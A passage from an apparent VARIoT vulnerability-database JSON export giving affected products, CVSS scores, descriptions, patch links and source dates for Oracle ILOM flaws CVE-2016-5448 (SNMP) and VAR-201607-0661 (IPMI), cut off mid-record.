"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.1.7.0"
},
{
"model": "bi publisher",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.2.1.0.0"
},
{
"model": "bi publisher",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.1.9.0"
},
{
"model": "bi publisher",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.1.7.0"
},
{
"model": "banking platform",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2.5.0"
},
{
"model": "banking platform",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2.4.1"
},
{
"model": "banking platform",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2.4.0"
},
{
"model": "banking platform",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2.3.0"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.0.3"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.0.2"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.0.1"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.2.6"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.2.1"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "3.2.1.00.10"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2.2.1"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1.1.3"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1.1.2"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1.1.1"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.0"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.2.3.00.08"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.2"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.1"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.0"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "3.2.0.00.27"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "3.2"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2.2"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2.1"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2.0"
},
{
"model": "application express",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1.5"
},
{
"model": "agile plm",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "9.3.5"
},
{
"model": "agile plm",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "9.3.4"
},
{
"model": "agile engineering data management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6.2.0.0"
},
{
"model": "agile engineering data management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6.1.3.0"
},
{
"model": "access manager",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.1.43"
},
{
"model": "access manager",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.1.4.2"
},
{
"model": "access manager",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.1.4"
},
{
"model": "access manager",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.2.0.0"
},
{
"model": "access manager",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.1.7.0"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.0"
},
{
"model": "websphere application server liberty pr",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.5.0-"
},
{
"model": "websphere application server full profile",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.5"
},
{
"model": "websphere application server liberty profile",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5"
},
{
"model": "websphere application server full profile",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5"
},
{
"model": "db2",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.8"
},
{
"model": "db2",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.7"
},
{
"model": "db2",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "11.1"
},
{
"model": "db2",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "10.5"
},
{
"model": "db2",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "10.1"
},
{
"model": "netscaler t1",
"scope": "eq",
"trust": 0.3,
"vendor": "citrix",
"version": "0"
},
{
"model": "netscaler service delivery appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "citrix",
"version": "0"
},
{
"model": "netscaler gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "citrix",
"version": "0"
},
{
"model": "netscaler application delivery controller",
"scope": "eq",
"trust": 0.3,
"vendor": "citrix",
"version": "0"
},
{
"model": "command center appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "citrix",
"version": "0"
},
{
"model": "cloudbridge",
"scope": "eq",
"trust": 0.3,
"vendor": "citrix",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "91787"
},
{
"db": "BID",
"id": "92008"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003876"
},
{
"db": "CNNVD",
"id": "CNNVD-201607-812"
},
{
"db": "NVD",
"id": "CVE-2016-5448"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:oracle:integrated_lights_out_manager_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-003876"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Oracle",
"sources": [
{
"db": "BID",
"id": "91787"
},
{
"db": "BID",
"id": "92008"
}
],
"trust": 0.6
},
"cve": "CVE-2016-5448",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 6.4,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CVE-2016-5448",
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 6.4,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "VHN-94267",
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:N/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "LOW",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"id": "CVE-2016-5448",
"impactScore": 2.5,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2016-5448",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2016-5448",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-201607-812",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-94267",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2016-5448",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-94267"
},
{
"db": "VULMON",
"id": "CVE-2016-5448"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003876"
},
{
"db": "CNNVD",
"id": "CNNVD-201607-812"
},
{
"db": "NVD",
"id": "CVE-2016-5448"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unspecified vulnerability in the ILOM component in Oracle Sun Systems Products Suite 3.0, 3.1, and 3.2 allows remote attackers to affect integrity and availability via vectors related to SNMP. Oracle has released advance notification regarding the July 2016 Critical Patch Update (CPU) to be released on July 19, 2016. The update addresses 276 vulnerabilities affecting the following software:\nOracle Application Express\nOracle Database Server\nOracle Access Manager\nOracle BI Publisher\nOracle Business Intelligence Enterprise Edition\nOracle Directory Server Enterprise Edition\nOracle Exalogic Infrastructure\nOracle Fusion Middleware\nOracle GlassFish Server\nOracle HTTP Server\nOracle JDeveloper\nOracle Portal\nOracle WebCenter Sites\nOracle WebLogic Server\nOutside In Technology\nHyperion Financial Reporting\nEnterprise Manager Base Platform\nEnterprise Manager for Fusion Middleware\nEnterprise Manager Ops Center\nOracle E-Business Suite\nOracle Agile Engineering Data Management\nOracle Agile PLM\nOracle Demand Planning\nOracle Engineering Data Management\nOracle Transportation Management\nPeopleSoft Enterprise FSCM\nPeopleSoft Enterprise PeopleTools\nJD Edwards EnterpriseOne Tools\nSiebel Applications\nOracle Fusion Applications\nOracle Communications ASAP\nOracle Communications Core Session Manager\nOracle Communications EAGLE Application Processor\nOracle Communications Messaging Server\nOracle Communications Network Charging and Control\nOracle Communications Operations Monitor\nOracle Communications Policy Management\nOracle Communications Session Border Controller\nOracle Communications Unified Session Manager\nOracle Enterprise Communications Broker\nOracle Banking Platform\nOracle Financial Services Lending and Leasing\nOracle FLEXCUBE Direct Banking\nOracle Health Sciences Clinical Development Center\nOracle Health Sciences Information Manager\nOracle Healthcare Analytics Data Integration\nOracle Healthcare Master Person Index\nOracle Documaker\nOracle Insurance Calculation Engine\nOracle Insurance Policy Administration J2EE\nOracle Insurance Rules Palette\nMICROS Retail XBRi Loss Prevention\nOracle Retail Central\nOracle Back Office\nOracle Returns Management\nOracle Retail Integration Bus\nOracle Retail Order Broker\nOracle Retail Service Backbone\nOracle Retail Store Inventory Management\nOracle Utilities Framework\nOracle Utilities Network Management System\nOracle Utilities Work and Asset Management\nOracle In-Memory Policy Analytics\nOracle Policy Automation\nOracle Policy Automation Connector for Siebel\nOracle Policy Automation for Mobile Devices\nPrimavera Contract Management\nPrimavera P6 Enterprise Project Portfolio Management\nOracle Java SE\nOracle Java SE Embedded\nOracle JRockit\n40G 10G 72/64 Ethernet Switch\nFujitsu M10-1 Servers\nFujitsu M10-4 Servers\nFujitsu M10-4S Servers\nILOM\nOracle Switch ES1-24\nSolaris\nSolaris Cluster\nSPARC Enterprise M3000 Servers\nSPARC Enterprise M4000 Servers\nSPARC Enterprise M5000 Servers\nSPARC Enterprise M8000 Servers\nSPARC Enterprise M9000 Servers\nSun Blade 6000 Ethernet Switched NEM 24P 10GE\nSun Data Center InfiniBand Switch 36\nSun Network 10GE Switch 72p\nSun Network QDR InfiniBand Gateway Switch\nOracle Secure Global Desktop\nOracle VM VirtualBox\nMySQL Server\nExploiting the most severe of these vulnerabilities may potentially compromise the database server or the host operating system. Oracle Integrated Lights Out Manager is prone to a remote security vulnerability in ILOM. \nThe vulnerability can be exploited over the \u0027SNMP\u0027 protocol. The \u0027SNMP\u0027 sub component is affected. \nThis vulnerability affects the following supported versions:\n3.0, 3.1, 3.2. Oracle Sun Systems Products Suite is a Sun system product suite of Oracle Corporation. A remote attacker could exploit this vulnerability to update, insert, or delete data, possibly causing a denial of service. Affect data integrity and availability",
"sources": [
{
"db": "NVD",
"id": "CVE-2016-5448"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003876"
},
{
"db": "BID",
"id": "91787"
},
{
"db": "BID",
"id": "92008"
},
{
"db": "VULHUB",
"id": "VHN-94267"
},
{
"db": "VULMON",
"id": "CVE-2016-5448"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2016-5448",
"trust": 2.9
},
{
"db": "BID",
"id": "91787",
"trust": 1.5
},
{
"db": "BID",
"id": "92008",
"trust": 1.5
},
{
"db": "SECTRACK",
"id": "1036408",
"trust": 1.2
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003876",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201607-812",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-94267",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2016-5448",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-94267"
},
{
"db": "VULMON",
"id": "CVE-2016-5448"
},
{
"db": "BID",
"id": "91787"
},
{
"db": "BID",
"id": "92008"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003876"
},
{
"db": "CNNVD",
"id": "CNNVD-201607-812"
},
{
"db": "NVD",
"id": "CVE-2016-5448"
}
]
},
"id": "VAR-201607-0655",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-94267"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-13T22:29:26.882000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Oracle Critical Patch Update Advisory - July 2016",
"trust": 0.8,
"url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html"
},
{
"title": "Text Form of Oracle Critical Patch Update - July 2016 Risk Matrices",
"trust": 0.8,
"url": "http://www.oracle.com/technetwork/topics/security/cpujul2016verbose-2881721.html"
},
{
"title": "July 2016 Critical Patch Update Released",
"trust": 0.8,
"url": "https://blogs.oracle.com/security/entry/july_2016_critical_patch_update"
},
{
"title": "Oracle Sun Systems Products Suite ILOM Fixes for component security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=63172"
},
{
"title": "Oracle: Oracle Critical Patch Update Advisory - July 2016",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=3a04485ebb79f7fbc2472bf9af5ce489"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2016-5448"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003876"
},
{
"db": "CNNVD",
"id": "CNNVD-201607-812"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2016-5448"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html"
},
{
"trust": 1.3,
"url": "http://www.securityfocus.com/bid/92008"
},
{
"trust": 1.2,
"url": "http://www.securityfocus.com/bid/91787"
},
{
"trust": 1.2,
"url": "http://www.securitytracker.com/id/1036408"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-5448"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-5448"
},
{
"trust": 0.3,
"url": "http://www.oracle.com"
},
{
"trust": 0.3,
"url": "http://support.citrix.com/article/ctx216642"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21984819"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988710"
},
{
"trust": 0.3,
"url": "http://www.oracle.com/index.html"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "http://tools.cisco.com/security/center/viewalert.x?alertid=47152"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-94267"
},
{
"db": "VULMON",
"id": "CVE-2016-5448"
},
{
"db": "BID",
"id": "91787"
},
{
"db": "BID",
"id": "92008"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003876"
},
{
"db": "CNNVD",
"id": "CNNVD-201607-812"
},
{
"db": "NVD",
"id": "CVE-2016-5448"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-94267"
},
{
"db": "VULMON",
"id": "CVE-2016-5448"
},
{
"db": "BID",
"id": "91787"
},
{
"db": "BID",
"id": "92008"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003876"
},
{
"db": "CNNVD",
"id": "CNNVD-201607-812"
},
{
"db": "NVD",
"id": "CVE-2016-5448"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-07-21T00:00:00",
"db": "VULHUB",
"id": "VHN-94267"
},
{
"date": "2016-07-21T00:00:00",
"db": "VULMON",
"id": "CVE-2016-5448"
},
{
"date": "2016-07-15T00:00:00",
"db": "BID",
"id": "91787"
},
{
"date": "2016-07-19T00:00:00",
"db": "BID",
"id": "92008"
},
{
"date": "2016-07-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-003876"
},
{
"date": "2016-07-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201607-812"
},
{
"date": "2016-07-21T10:15:03.867000",
"db": "NVD",
"id": "CVE-2016-5448"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-09-01T00:00:00",
"db": "VULHUB",
"id": "VHN-94267"
},
{
"date": "2017-09-01T00:00:00",
"db": "VULMON",
"id": "CVE-2016-5448"
},
{
"date": "2018-10-15T09:00:00",
"db": "BID",
"id": "91787"
},
{
"date": "2016-07-19T00:00:00",
"db": "BID",
"id": "92008"
},
{
"date": "2016-07-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-003876"
},
{
"date": "2016-07-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201607-812"
},
{
"date": "2025-04-12T10:46:40.837000",
"db": "NVD",
"id": "CVE-2016-5448"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "91787"
},
{
"db": "BID",
"id": "92008"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Oracle Sun Systems Products Suite of ILOM In SNMP Vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-003876"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unknown",
"sources": [
{
"db": "BID",
"id": "91787"
},
{
"db": "BID",
"id": "92008"
}
],
"trust": 0.6
}
}
VAR-201607-0661
Vulnerability from variot - Updated: 2025-04-13 22:06Unspecified vulnerability in the ILOM component in Oracle Sun Systems Products Suite 3.0, 3.1, and 3.2 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to IPMI. (DoS) An attack may be carried out. Oracle has released advance notification regarding the July 2016 Critical Patch Update (CPU) to be released on July 19, 2016. The update addresses 276 vulnerabilities affecting the following software: Oracle Application Express Oracle Database Server Oracle Access Manager Oracle BI Publisher Oracle Business Intelligence Enterprise Edition Oracle Directory Server Enterprise Edition Oracle Exalogic Infrastructure Oracle Fusion Middleware Oracle GlassFish Server Oracle HTTP Server Oracle JDeveloper Oracle Portal Oracle WebCenter Sites Oracle WebLogic Server Outside In Technology Hyperion Financial Reporting Enterprise Manager Base Platform Enterprise Manager for Fusion Middleware Enterprise Manager Ops Center Oracle E-Business Suite Oracle Agile Engineering Data Management Oracle Agile PLM Oracle Demand Planning Oracle Engineering Data Management Oracle Transportation Management PeopleSoft Enterprise FSCM PeopleSoft Enterprise PeopleTools JD Edwards EnterpriseOne Tools Siebel Applications Oracle Fusion Applications Oracle Communications ASAP Oracle Communications Core Session Manager Oracle Communications EAGLE Application Processor Oracle Communications Messaging Server Oracle Communications Network Charging and Control Oracle Communications Operations Monitor Oracle Communications Policy Management Oracle Communications Session Border Controller Oracle Communications Unified Session Manager Oracle Enterprise Communications Broker Oracle Banking Platform Oracle Financial Services Lending and Leasing Oracle FLEXCUBE Direct Banking Oracle Health Sciences Clinical Development Center Oracle Health Sciences Information Manager Oracle Healthcare Analytics Data Integration Oracle Healthcare Master Person Index Oracle Documaker Oracle Insurance Calculation Engine Oracle Insurance Policy Administration J2EE Oracle Insurance Rules Palette MICROS Retail XBRi Loss Prevention Oracle Retail Central Oracle Back Office Oracle Returns Management Oracle Retail Integration Bus Oracle Retail Order Broker Oracle Retail Service Backbone Oracle Retail Store Inventory Management Oracle Utilities Framework Oracle Utilities Network Management System Oracle Utilities Work and Asset Management Oracle In-Memory Policy Analytics Oracle Policy Automation Oracle Policy Automation Connector for Siebel Oracle Policy Automation for Mobile Devices Primavera Contract Management Primavera P6 Enterprise Project Portfolio Management Oracle Java SE Oracle Java SE Embedded Oracle JRockit 40G 10G 72/64 Ethernet Switch Fujitsu M10-1 Servers Fujitsu M10-4 Servers Fujitsu M10-4S Servers ILOM Oracle Switch ES1-24 Solaris Solaris Cluster SPARC Enterprise M3000 Servers SPARC Enterprise M4000 Servers SPARC Enterprise M5000 Servers SPARC Enterprise M8000 Servers SPARC Enterprise M9000 Servers Sun Blade 6000 Ethernet Switched NEM 24P 10GE Sun Data Center InfiniBand Switch 36 Sun Network 10GE Switch 72p Sun Network QDR InfiniBand Gateway Switch Oracle Secure Global Desktop Oracle VM VirtualBox MySQL Server Exploiting the most severe of these vulnerabilities may potentially compromise the database server or the host operating system. Oracle Integrated Lights Out Manager is prone to a remote security vulnerability in ILOM. The vulnerability can be exploited over the 'IPMI' protocol. The 'IPMI' sub component is affected. This vulnerability affects the following supported versions: 3.0, 3.1, 3.2. Oracle Sun Systems Products Suite is a Sun system product suite of Oracle Corporation
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201607-0661",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "integrated lights out manager",
"scope": "eq",
"trust": 3.0,
"vendor": "oracle",
"version": "3.2"
},
{
"model": "integrated lights out manager",
"scope": "eq",
"trust": 3.0,
"vendor": "oracle",
"version": "3.1"
},
{
"model": "integrated lights out manager",
"scope": "eq",
"trust": 3.0,
"vendor": "oracle",
"version": "3.0"
},
{
"model": "jre update",
"scope": "eq",
"trust": 0.9,
"vendor": "oracle",
"version": "1.8.092"
},
{
"model": "jre update",
"scope": "eq",
"trust": 0.9,
"vendor": "oracle",
"version": "1.8.091"
},
{
"model": "jre update",
"scope": "eq",
"trust": 0.9,
"vendor": "oracle",
"version": "1.7.0101"
},
{
"model": "jre update",
"scope": "eq",
"trust": 0.9,
"vendor": "oracle",
"version": "1.6.0115"
},
{
"model": "jdk update",
"scope": "eq",
"trust": 0.9,
"vendor": "oracle",
"version": "1.8.092"
},
{
"model": "jdk update",
"scope": "eq",
"trust": 0.9,
"vendor": "oracle",
"version": "1.8.091"
},
{
"model": "jdk update",
"scope": "eq",
"trust": 0.9,
"vendor": "oracle",
"version": "1.7.0101"
},
{
"model": "jdk update",
"scope": "eq",
"trust": 0.9,
"vendor": "oracle",
"version": "1.6.0115"
},
{
"model": "weblogic server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.2.1"
},
{
"model": "weblogic server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.3.60"
},
{
"model": "weblogic server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1.3.0"
},
{
"model": "webcenter sites",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.18.0"
},
{
"model": "webcenter sites",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.2.1.0"
},
{
"model": "vm virtualbox",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.0.16"
},
{
"model": "vm virtualbox",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.0.14"
},
{
"model": "vm virtualbox",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.0.13"
},
{
"model": "vm virtualbox",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.0.12"
},
{
"model": "vm virtualbox",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.0.11"
},
{
"model": "vm virtualbox",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.0.10"
},
{
"model": "vm virtualbox",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.0.9"
},
{
"model": "vm virtualbox",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.0.8"
},
{
"model": "vm virtualbox",
"scope": "eq",
